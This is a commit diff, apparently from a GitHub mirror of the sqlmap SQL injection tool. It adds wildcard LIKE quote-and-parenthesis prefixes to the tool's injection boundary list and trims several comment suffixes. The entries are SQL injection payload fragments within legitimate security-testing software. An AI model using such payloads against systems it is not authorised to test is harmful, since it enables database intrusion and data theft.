mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-07-15 02:32:31 +03:00
adding revisited wildcard LIKE payloads
This commit is contained in:
parent
602369c762
commit
3a9e266d78
|
@ -446,6 +446,42 @@ Formats:
|
||||||
<prefix>"</prefix>
|
<prefix>"</prefix>
|
||||||
<suffix>AND "[RANDSTR]" LIKE "[RANDSTR]</suffix>
|
<suffix>AND "[RANDSTR]" LIKE "[RANDSTR]</suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
|
|
||||||
|
<boundary>
|
||||||
|
<level>2</level>
|
||||||
|
<clause>1</clause>
|
||||||
|
<where>1,2</where>
|
||||||
|
<ptype>2</ptype>
|
||||||
|
<prefix>%')</prefix>
|
||||||
|
<suffix></suffix>
|
||||||
|
</boundary>
|
||||||
|
|
||||||
|
<boundary>
|
||||||
|
<level>3</level>
|
||||||
|
<clause>1</clause>
|
||||||
|
<where>1,2</where>
|
||||||
|
<ptype>2</ptype>
|
||||||
|
<prefix>%'))</prefix>
|
||||||
|
<suffix></suffix>
|
||||||
|
</boundary>
|
||||||
|
|
||||||
|
<boundary>
|
||||||
|
<level>4</level>
|
||||||
|
<clause>1</clause>
|
||||||
|
<where>1,2</where>
|
||||||
|
<ptype>2</ptype>
|
||||||
|
<prefix>%')))</prefix>
|
||||||
|
<suffix></suffix>
|
||||||
|
</boundary>
|
||||||
|
|
||||||
|
<boundary>
|
||||||
|
<level>1</level>
|
||||||
|
<clause>1</clause>
|
||||||
|
<where>1,2</where>
|
||||||
|
<ptype>2</ptype>
|
||||||
|
<prefix>%'</prefix>
|
||||||
|
<suffix></suffix>
|
||||||
|
</boundary>
|
||||||
<!-- End of WHERE/HAVING clause boundaries -->
|
<!-- End of WHERE/HAVING clause boundaries -->
|
||||||
|
|
||||||
|
|
||||||
|
@ -456,7 +492,7 @@ Formats:
|
||||||
<where>1,2</where>
|
<where>1,2</where>
|
||||||
<ptype>2</ptype>
|
<ptype>2</ptype>
|
||||||
<prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
|
<prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||||
<suffix>-- AND ('[RANDSTR]'='[RANDSTR]</suffix>
|
<suffix>-- </suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
|
|
||||||
<boundary>
|
<boundary>
|
||||||
|
@ -465,7 +501,7 @@ Formats:
|
||||||
<where>1,2</where>
|
<where>1,2</where>
|
||||||
<ptype>2</ptype>
|
<ptype>2</ptype>
|
||||||
<prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
|
<prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||||
<suffix>-- AND ("[RANDSTR]"="[RANDSTR]</suffix>
|
<suffix>-- </suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
|
|
||||||
<boundary>
|
<boundary>
|
||||||
|
@ -474,7 +510,7 @@ Formats:
|
||||||
<where>1,2</where>
|
<where>1,2</where>
|
||||||
<ptype>1</ptype>
|
<ptype>1</ptype>
|
||||||
<prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
|
<prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||||
<suffix>-- AND ([RANDNUM1]=[RANDNUM1]</suffix>
|
<suffix>-- </suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
|
|
||||||
<boundary>
|
<boundary>
|
||||||
|
@ -483,7 +519,7 @@ Formats:
|
||||||
<where>1,2</where>
|
<where>1,2</where>
|
||||||
<ptype>2</ptype>
|
<ptype>2</ptype>
|
||||||
<prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
|
<prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||||
<suffix>-- AND '[RANDSTR]'='[RANDSTR]</suffix>
|
<suffix>-- </suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
|
|
||||||
<boundary>
|
<boundary>
|
||||||
|
@ -492,7 +528,7 @@ Formats:
|
||||||
<where>1,2</where>
|
<where>1,2</where>
|
||||||
<ptype>4</ptype>
|
<ptype>4</ptype>
|
||||||
<prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
|
<prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||||
<suffix>-- AND "[RANDSTR]"="[RANDSTR]</suffix>
|
<suffix>-- </suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
|
|
||||||
<boundary>
|
<boundary>
|
||||||
|
@ -501,7 +537,7 @@ Formats:
|
||||||
<where>1,2</where>
|
<where>1,2</where>
|
||||||
<ptype>1</ptype>
|
<ptype>1</ptype>
|
||||||
<prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
|
<prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
|
||||||
<suffix>-- AND [RANDNUM1]=[RANDNUM1]</suffix>
|
<suffix>-- </suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
<!-- End of pre-WHERE generic boundaries -->
|
<!-- End of pre-WHERE generic boundaries -->
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue
Block a user